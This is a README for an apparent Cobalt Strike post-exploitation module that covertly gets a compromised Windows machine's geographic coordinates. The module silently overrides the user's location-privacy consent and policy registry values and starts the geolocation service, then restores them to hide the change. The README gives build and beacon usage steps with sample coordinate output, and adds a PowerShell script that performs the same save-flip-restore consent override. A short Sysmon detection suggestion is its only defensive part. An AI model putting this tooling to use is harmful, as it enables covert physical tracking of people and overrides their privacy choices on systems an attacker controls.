A Cobalt Strike BOF that attempts to retrieve Windows geolocation coordinates without fork & run. It uses the WinRT Geolocator API first and falls back to the legacy ILocation API.
Simple BOF that uses WinRT geolocation with a legacy ILocation fallback. While it runs it flips the following registry values (key, then the value names it sets):
- HKCU\Software\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location: Value=Allow
- HKCU\Software\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged\<encoded process path>: Value=Allow
- Admin only: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location: Value=Allow
- Admin only: HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors: DisableLocation=0, DisableWindowsLocationProvider=0
- Admin only: HKLM\SOFTWARE\Policies\Microsoft\Windows\AppPrivacy: LetAppsAccessLocation=1
- Admin only: HKLM\SYSTEM\CurrentControlSet\Services\lfsvc\Service\Configuration: Status=1
When run as admin, the BOF also temporarily sets the start type of the lfsvc service (the Windows Geolocation Service) to demand start and attempts to start it.
All of these changes are reverted before the BOF returns.
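The following PowerShell is an added example for this page, not code from GeoLocationBOF itself. It audits the consent and policy values listed above and shows the same save/flip/restore pattern the BOF performs, so you can check a target (or a lab box) before running the BOF and confirm afterwards that everything was put back. It assumes PowerShell 5.1 or later on Windows; the HKLM and lfsvc parts only work from an elevated shell. The registry paths and value names are the ones the README lists; the `#`-encoded NonPackaged subkey names and the LastUsedTimeStart/LastUsedTimeStop values next to them are standard Windows conventions that the README does not mention.

```powershell
# Added example, not part of GeoLocationBOF: audit the location consent/policy values the
# README lists and demonstrate the save -> flip -> run -> restore pattern in PowerShell 5.1+.
# HKLM values and the lfsvc service can only be changed from an elevated shell.

$ConsentStore = 'Software\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location'

# Registry path, value name, the data that permits location, and whether changing it needs admin.
$LocationSettings = @(
    @{ Path = "HKCU:\$ConsentStore";                                                 Name = 'Value';                          Want = 'Allow'; Admin = $false }
    @{ Path = "HKLM:\$ConsentStore";                                                 Name = 'Value';                          Want = 'Allow'; Admin = $true  }
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors';        Name = 'DisableLocation';                Want = 0;       Admin = $true  }
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors';        Name = 'DisableWindowsLocationProvider'; Want = 0;       Admin = $true  }
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppPrivacy';                Name = 'LetAppsAccessLocation';          Want = 1;       Admin = $true  }
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\lfsvc\Service\Configuration'; Name = 'Status';                         Want = 1;       Admin = $true  }
)

function Get-LocationConsentState {
    # One row per setting: current data (or <absent>) and whether it already permits location.
    foreach ($s in $LocationSettings) {
        $cur = (Get-ItemProperty -Path $s.Path -Name $s.Name -ErrorAction SilentlyContinue).($s.Name)
        $shown = if ($null -eq $cur) { '<absent>' } else { $cur }
        [pscustomobject]@{ Path = $s.Path; Name = $s.Name; Current = $shown; Permits = ($cur -eq $s.Want); LastUsed = $null }
    }
    # Per-process grants: each NonPackaged subkey name is the exe path with '\' encoded as '#'.
    # Windows records LastUsedTimeStart/Stop (FILETIME) beside Value when a process uses the
    # capability; restoring Value does not clear those timestamps, so they remain as a trace.
    Get-ChildItem -Path "HKCU:\$ConsentStore\NonPackaged" -ErrorAction SilentlyContinue | ForEach-Object {
        $p = Get-ItemProperty -Path $_.PSPath
        $shown = if ($null -eq $p.Value) { '<absent>' } else { $p.Value }
        $last = if ($p.LastUsedTimeStart) { [datetime]::FromFileTime($p.LastUsedTimeStart) } else { $null }
        [pscustomobject]@{ Path = ($_.PSChildName -replace '#', '\'); Name = 'Value'; Current = $shown; Permits = ($p.Value -eq 'Allow'); LastUsed = $last }
    }
}

function Invoke-WithLocationEnabled {
    # Flip every setting this context may change, run $Action, then restore in a finally block.
    # Values that did not exist before are deleted again; keys created on the way are left in
    # place (an empty policy key is harmless but is a visible trace).
    param([Parameter(Mandatory)][scriptblock] $Action)

    $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    $saved = New-Object System.Collections.Generic.List[object]
    $svcStart = $null; $svcWasRunning = $null
    try {
        foreach ($s in $LocationSettings) {
            if ($s.Admin -and -not $isAdmin) { continue }
            $old = (Get-ItemProperty -Path $s.Path -Name $s.Name -ErrorAction SilentlyContinue).($s.Name)
            if (-not (Test-Path -Path $s.Path)) { New-Item -Path $s.Path -Force | Out-Null }
            Set-ItemProperty -Path $s.Path -Name $s.Name -Value $s.Want
            $saved.Add(@{ Path = $s.Path; Name = $s.Name; Old = $old })
        }
        if ($isAdmin) {
            # lfsvc is the Geolocation Service. A disabled service cannot be started, so move it
            # to demand start (Manual) for the duration and put it back afterwards.
            $svc = Get-Service -Name lfsvc
            $svcStart = $svc.StartType
            $svcWasRunning = ($svc.Status -eq 'Running')
            if ($svcStart -eq 'Disabled') { Set-Service -Name lfsvc -StartupType Manual }
            if (-not $svcWasRunning) { Start-Service -Name lfsvc -ErrorAction SilentlyContinue }
        }
        & $Action
    }
    finally {
        # Undo in reverse order of application.
        for ($i = $saved.Count - 1; $i -ge 0; $i--) {
            $r = $saved[$i]
            if ($null -eq $r.Old) { Remove-ItemProperty -Path $r.Path -Name $r.Name -ErrorAction SilentlyContinue }
            else { Set-ItemProperty -Path $r.Path -Name $r.Name -Value $r.Old }
        }
        if ($svcWasRunning -eq $false) { Stop-Service -Name lfsvc -Force -ErrorAction SilentlyContinue }
        if ($svcStart -eq 'Disabled') { Set-Service -Name lfsvc -StartupType Disabled }
    }
}

# Usage: audit first, then run something with location temporarily enabled.
Get-LocationConsentState | Format-Table -AutoSize
Invoke-WithLocationEnabled { Get-Service -Name lfsvc | Select-Object Name, Status, StartType }
```

Because the BOF restores each value before it returns, a point-in-time audit like `Get-LocationConsentState` will normally show the original baseline. To see the transient flip you need value-set logging on those paths, for example a Sysmon RegistryEvent (Event ID 13) rule covering the `ConsentStore\location`, `LocationAndSensors` and `AppPrivacy` keys, and then alert on `Allow`, `0` or `1` being written there by a process that is not normally a settings or policy component.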
- git clone the repo
- run make
- import the GeoLocationBOF.cna script into Cobalt Strike
- use the command geolocation_bof
beacon> geolocation_bof
[*] Running geolocation_bof by (@codex_tf2)
[+] host called home, sent: 30095 bytes
[+] received output:
latitude=12.34567890
longitude=-12.34567890
accuracy_radius_meters=25.00
- Windows location services must be available on the target.
- Location privacy settings, policy, sensors, and provider availability can prevent results.
- Admin context is required to enable the location permission if it is not already granted.
- Temporary registry changes are made to grant location permission and are restored before the BOF exits.
- No evasion is performed; apply your own OPSEC.
This BOF is meant to provide a direct in-process way to request Windows geolocation data.
usual disclaimer here, I am not responsible for any crimes against humanity you may commit or nuclear war you may cause using this piece of poorly written code.